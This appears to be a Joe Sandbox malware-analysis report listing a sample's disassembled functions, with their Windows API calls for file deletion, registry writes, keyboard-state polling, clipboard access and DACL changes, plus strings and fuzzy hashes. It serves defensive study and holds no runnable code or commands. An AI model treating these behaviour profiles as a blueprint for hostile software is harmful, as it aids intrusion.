Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 5091bc0c47454482d8b1b8b2d76ffc3d067ac7add7a71eb57255a5eaa26471b6
Instruction ID: c46435ff02ecdf99e0d02d66c0a9fd904f420cd6846097b5953deb1603ba28fc
Opcode Fuzzy Hash: 5091bc0c47454482d8b1b8b2d76ffc3d067ac7add7a71eb57255a5eaa26471b6
Instruction Fuzzy Hash: D8518F39204302AFD315AF60EC86FAF77A8BF85B00F11456DF556D22A1DF70E9059B62

Uniqueness

Uniqueness Score: -1.00%

Function 00C2C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C2C9F8
FindClose.KERNEL32(00000000), ref: 00C2CA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C2CA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C2CA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 00C2CAAF
__swprintf.LIBCMT ref: 00C2CAFB
__swprintf.LIBCMT ref: 00C2CB3E

Part of subcall function 00BC7F41: _memmove.LIBCMT ref: 00BC7F82

__swprintf.LIBCMT ref: 00C2CB92

Part of subcall function 00BE38D8: __woutput_l.LIBCMT ref: 00BE3931

__swprintf.LIBCMT ref: 00C2CBE0

Part of subcall function 00BE38D8: __flsbuf.LIBCMT ref: 00BE3953
Part of subcall function 00BE38D8: __flsbuf.LIBCMT ref: 00BE396B

__swprintf.LIBCMT ref: 00C2CC2F
__swprintf.LIBCMT ref: 00C2CC7E
__swprintf.LIBCMT ref: 00C2CCCD

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00C2CAF5
%4d, xrefs: 00C2CB38
%02d, xrefs: 00C2CB86, 00C2CB90, 00C2CBDE, 00C2CC2D, 00C2CC7C, 00C2CCCB

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: a2051a5d6e5ca2d90811c65b67a9304f93c75af6e431eb206635ed41db3218b9
Instruction ID: dd8ddfb4d12f297e94d59daac12bbdf8bed15a604c18be8b4b95a738defc024f
Opcode Fuzzy Hash: a2051a5d6e5ca2d90811c65b67a9304f93c75af6e431eb206635ed41db3218b9
Instruction Fuzzy Hash: 0BA12BB1408344ABD710EB65C886EAFB7ECBF94700F40496DF596C3191EB74EA09CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C2F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00C2F221
_wcscmp.LIBCMT ref: 00C2F236
_wcscmp.LIBCMT ref: 00C2F24D
GetFileAttributesW.KERNEL32(?), ref: 00C2F25F
SetFileAttributesW.KERNEL32(?,?), ref: 00C2F279
FindNextFileW.KERNEL32(00000000,?), ref: 00C2F291
FindClose.KERNEL32(00000000), ref: 00C2F29C
FindFirstFileW.KERNEL32(*.*,?), ref: 00C2F2B8
_wcscmp.LIBCMT ref: 00C2F2DF
_wcscmp.LIBCMT ref: 00C2F2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 00C2F308
SetCurrentDirectoryW.KERNEL32(00C7A5A0), ref: 00C2F326
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C2F330
FindClose.KERNEL32(00000000), ref: 00C2F33D
FindClose.KERNEL32(00000000), ref: 00C2F34F

Strings

*.*, xrefs: 00C2F2B3

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 2b2b90edeedd757d5bb094abf0756da9ea0ec5d65b9f5d129f50586738f4eab2
Instruction ID: 11878b1c3a0b3010ca34661d33b833f4e86e09af279c5c5227232f94b72282e8
Opcode Fuzzy Hash: 2b2b90edeedd757d5bb094abf0756da9ea0ec5d65b9f5d129f50586738f4eab2
Instruction Fuzzy Hash: 7331A27650062D6ADB20DBB4EC58BDE77BCAF4A361F104179E914D30A0EB70DE468B60

Uniqueness

Uniqueness Score: -1.00%

Function 00C40AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C40BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,00C4F910,00000000,?,00000000,?,?), ref: 00C40C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00C40C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00C40D1D
RegCloseKey.ADVAPI32(?), ref: 00C4103D
RegCloseKey.ADVAPI32(00000000), ref: 00C4104A

Strings

REG_MULTI_SZ, xrefs: 00C40E05
REG_EXPAND_SZ, xrefs: 00C40CBA
REG_SZ, xrefs: 00C40D5B
REG_BINARY, xrefs: 00C40FD8
REG_QWORD, xrefs: 00C40F8B
REG_DWORD, xrefs: 00C40F0E

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: a1ca8442a3f3699b6dc83bd6ba0bf512226389c650f50c1bee501942f69029da
Instruction ID: 2f8779811cc6e36ce3983f9f5cc43e041d42afc3d7095cb2620b29c1363a2aec
Opcode Fuzzy Hash: a1ca8442a3f3699b6dc83bd6ba0bf512226389c650f50c1bee501942f69029da
Instruction Fuzzy Hash: F80277352006419FDB14EF25C885E2AB7E5FF89710F0588ADF99A9B362CB30ED41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00C2F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00C2F37E
_wcscmp.LIBCMT ref: 00C2F393
_wcscmp.LIBCMT ref: 00C2F3AA

Part of subcall function 00C245C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C245DC

FindNextFileW.KERNEL32(00000000,?), ref: 00C2F3D9
FindClose.KERNEL32(00000000), ref: 00C2F3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 00C2F400
_wcscmp.LIBCMT ref: 00C2F427
_wcscmp.LIBCMT ref: 00C2F43E
SetCurrentDirectoryW.KERNEL32(?), ref: 00C2F450
SetCurrentDirectoryW.KERNEL32(00C7A5A0), ref: 00C2F46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C2F478
FindClose.KERNEL32(00000000), ref: 00C2F485
FindClose.KERNEL32(00000000), ref: 00C2F497

Strings

*.*, xrefs: 00C2F3FB

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 05f20e3808e5aef96bf23f88959901f841a8a5594342e96ad2ad74195995e0ba
Instruction ID: 5c0de37d5ed4b2784140b4abc3a176eed395bb5554cbce206c22921e66d3c16f
Opcode Fuzzy Hash: 05f20e3808e5aef96bf23f88959901f841a8a5594342e96ad2ad74195995e0ba
Instruction Fuzzy Hash: 5A31C27550162D6BDB20EB64EC88BDE77BCAF49320F1041B9E854A34A0DBB0DF46CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00C181F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C1874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C18766
Part of subcall function 00C1874A: GetLastError.KERNEL32(?,00C1822A,?,?,?), ref: 00C18770
Part of subcall function 00C1874A: GetProcessHeap.KERNEL32(00000008,?,?,00C1822A,?,?,?), ref: 00C1877F
Part of subcall function 00C1874A: HeapAlloc.KERNEL32(00000000,?,00C1822A,?,?,?), ref: 00C18786
Part of subcall function 00C1874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C1879D

Part of subcall function 00C187E7: GetProcessHeap.KERNEL32(00000008,00C18240,00000000,00000000,?,00C18240,?), ref: 00C187F3
Part of subcall function 00C187E7: HeapAlloc.KERNEL32(00000000,?,00C18240,?), ref: 00C187FA
Part of subcall function 00C187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C18240,?), ref: 00C1880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C1825B
_memset.LIBCMT ref: 00C18270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C1828F
GetLengthSid.ADVAPI32(?), ref: 00C182A0
GetAce.ADVAPI32(?,00000000,?), ref: 00C182DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C182F9
GetLengthSid.ADVAPI32(?), ref: 00C18316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C18325
HeapAlloc.KERNEL32(00000000), ref: 00C1832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C1834D
CopySid.ADVAPI32(00000000), ref: 00C18354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C18385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C183AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C183BF

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 9ffb62fdc0f834cb722dab0647b183e7bf5503e56a4805ac91792b74f404149d
Instruction ID: b73c7d77247ed151346b90e0e5d6ecc70335b0b11ef038642f08c450ef6fe839
Opcode Fuzzy Hash: 9ffb62fdc0f834cb722dab0647b183e7bf5503e56a4805ac91792b74f404149d
Instruction Fuzzy Hash: 6C616F75904109AFDF04DF94DC44BEEBBB9FF06700F148169F825A7291DB319A45EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BD6843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

LF), xrefs: 00C116DD
ANYCRLF), xrefs: 00C11734
NO_AUTO_POSSESS), xrefs: 00C11567
NO_START_OPT), xrefs: 00C11588
UCP), xrefs: 00C11546
BSR_ANYCRLF), xrefs: 00C11757
CR), xrefs: 00C116C0
UTF), xrefs: 00C11533
LIMIT_RECURSION=, xrefs: 00C11635
ANY), xrefs: 00C11717
BSR_UNICODE), xrefs: 00C11771
LIMIT_MATCH=, xrefs: 00C115A9
UTF16), xrefs: 00C11508
CRLF), xrefs: 00C116FA

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 485a14c6943c0c649cbf504bc6ee35f6129518572340322f7aff4a562f56f092
Instruction ID: f278d1934bce5463440f8d55a55d56220a8b02a68ef5e3bfa83d52e6ef82fee9
Opcode Fuzzy Hash: 485a14c6943c0c649cbf504bc6ee35f6129518572340322f7aff4a562f56f092
Instruction Fuzzy Hash: 93726F71E002199BDB24CF59D8807EDB7F5EF49310F1881AAE959EB380E7749E81DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C40665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C40038,?,?), ref: 00C410BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C40737

Part of subcall function 00BC9997: __itow.LIBCMT ref: 00BC99C2
Part of subcall function 00BC9997: __swprintf.LIBCMT ref: 00BC9A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C407D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C4086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C40AAD
RegCloseKey.ADVAPI32(00000000), ref: 00C40ABA

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 13fc7057d571cf6fe285c4c954481c97c2a47ca67d750d56d15272d3a819a6c1
Instruction ID: d6dc34f50abf256b9aea25f2b8a24b77ffdf54014c4ffa5aa09f73c870676a9b
Opcode Fuzzy Hash: 13fc7057d571cf6fe285c4c954481c97c2a47ca67d750d56d15272d3a819a6c1
Instruction Fuzzy Hash: 39E14C31204310AFCB14DF29C895E6ABBE4FF89714B14896DF99ADB262DB30ED01DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00C20219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C20241
GetAsyncKeyState.USER32(000000A0), ref: 00C202C2
GetKeyState.USER32(000000A0), ref: 00C202DD
GetAsyncKeyState.USER32(000000A1), ref: 00C202F7
GetKeyState.USER32(000000A1), ref: 00C2030C
GetAsyncKeyState.USER32(00000011), ref: 00C20324
GetKeyState.USER32(00000011), ref: 00C20336
GetAsyncKeyState.USER32(00000012), ref: 00C2034E
GetKeyState.USER32(00000012), ref: 00C20360
GetAsyncKeyState.USER32(0000005B), ref: 00C20378
GetKeyState.USER32(0000005B), ref: 00C2038A

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 35543589ed45e6c82a6a5e38cc5287a5a3153b77d6975055e97787e4f1a8a3ed
Instruction ID: 0ff830a93de79c34a919e6f54106c6503340a37b3ec91249174f1ac1a308f800
Opcode Fuzzy Hash: 35543589ed45e6c82a6a5e38cc5287a5a3153b77d6975055e97787e4f1a8a3ed
Instruction Fuzzy Hash: B241C9345047D9AEFF31CA64A8083A5BEA07F16340F28409FD5D6569D3E7E45BC487A2

Uniqueness

Uniqueness Score: -1.00%

Function 00C386D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC9997: __itow.LIBCMT ref: 00BC99C2
Part of subcall function 00BC9997: __swprintf.LIBCMT ref: 00BC9A0C

CoInitialize.OLE32 ref: 00C38718
CoUninitialize.OLE32 ref: 00C38723
CoCreateInstance.OLE32(?,00000000,00000017,00C52BEC,?), ref: 00C38783
IIDFromString.OLE32(?,?), ref: 00C387F6
VariantInit.OLEAUT32(?), ref: 00C38890
VariantClear.OLEAUT32(?), ref: 00C388F1

Strings

Invalid parameter, xrefs: 00C3880F
NULL Pointer assignment, xrefs: 00C387C8
Failed to create object, xrefs: 00C3878E, 00C38844

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 97ac572a9c21eb90301178fc3fcc3ff304db3dcd286700d3d436c41f4be7a826
Instruction ID: 79915cdd49d16a83eb18065144381e8d498997b32e1b36a9b7d39f194d9a50dc
Opcode Fuzzy Hash: 97ac572a9c21eb90301178fc3fcc3ff304db3dcd286700d3d436c41f4be7a826
Instruction Fuzzy Hash: A161AC70618301AFD710DF25C848F6EBBE4AF8A714F10485DF9959B291CB70EE48CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C34458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00C3447F
EmptyClipboard.USER32 ref: 00C34485
GlobalAlloc.KERNEL32(00000002,?), ref: 00C3449A
CloseClipboard.USER32 ref: 00C34539

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 7afbe5d4b5a2583eb2e68b762c6f14b4ca6b70d4297ee4edb4882457471a648e
Instruction ID: 5cb9fdbfdf2511c125b1c187db06e801683f04b3d56b807557966ca244fb4b7f
Opcode Fuzzy Hash: 7afbe5d4b5a2583eb2e68b762c6f14b4ca6b70d4297ee4edb4882457471a648e
Instruction Fuzzy Hash: FA218E39200610AFEB14AF65EC09FAE77A8FF05711F11806AF94ADB2A1CB74AD01DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00C23A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BC48A1,?,?,00BC37C0,?), ref: 00BC48CE

Part of subcall function 00C24CD3: GetFileAttributesW.KERNEL32(?,00C23947), ref: 00C24CD4

FindFirstFileW.KERNEL32(?,?), ref: 00C23ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00C23B87
MoveFileW.KERNEL32(?,?), ref: 00C23B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00C23BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C23BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00C23BF5

Strings

\*.*, xrefs: 00C23A8A, 00C23A93, 00C23AA8

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 8d65faef803e5210b75d4c8c5fd2975c93062cf0b062a110930881024fec0219
Instruction ID: 2758efb5cec960dc8d88e06a72a735626479fbc48def718389811f80cf54b78d
Opcode Fuzzy Hash: 8d65faef803e5210b75d4c8c5fd2975c93062cf0b062a110930881024fec0219
Instruction Fuzzy Hash: 09516C3180129D9BCF15EBA0DE92EEDB7B9AF14300F6441A9E45277091EF356F09DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C2F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC7F41: _memmove.LIBCMT ref: 00BC7F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00C2F6AB
Sleep.KERNEL32(0000000A), ref: 00C2F6DB
_wcscmp.LIBCMT ref: 00C2F6EF
_wcscmp.LIBCMT ref: 00C2F70A
FindNextFileW.KERNEL32(?,?), ref: 00C2F7A8
FindClose.KERNEL32(00000000), ref: 00C2F7BE

Strings

*.*, xrefs: 00C2F690

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: ddf2d68c48ce7a9972c91b1c9dda50f163ac2ae0c8b926fc83f2c05e82798285
Instruction ID: d3eda0b67bef7994d149252e080c580700e01af0f93f69cf318cad7fbb0fe47d
Opcode Fuzzy Hash: ddf2d68c48ce7a9972c91b1c9dda50f163ac2ae0c8b926fc83f2c05e82798285
Instruction Fuzzy Hash: 7E414B7590021E9BCB11DF64DC89EEEBBB4FF05710F1445BAE825A21A1DB309E45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BD4140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00BD4520
VUUU, xrefs: 00C07B0C
VUUU, xrefs: 00BD44DB
VUUU, xrefs: 00BD44ED
ERCP, xrefs: 00BD421F

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
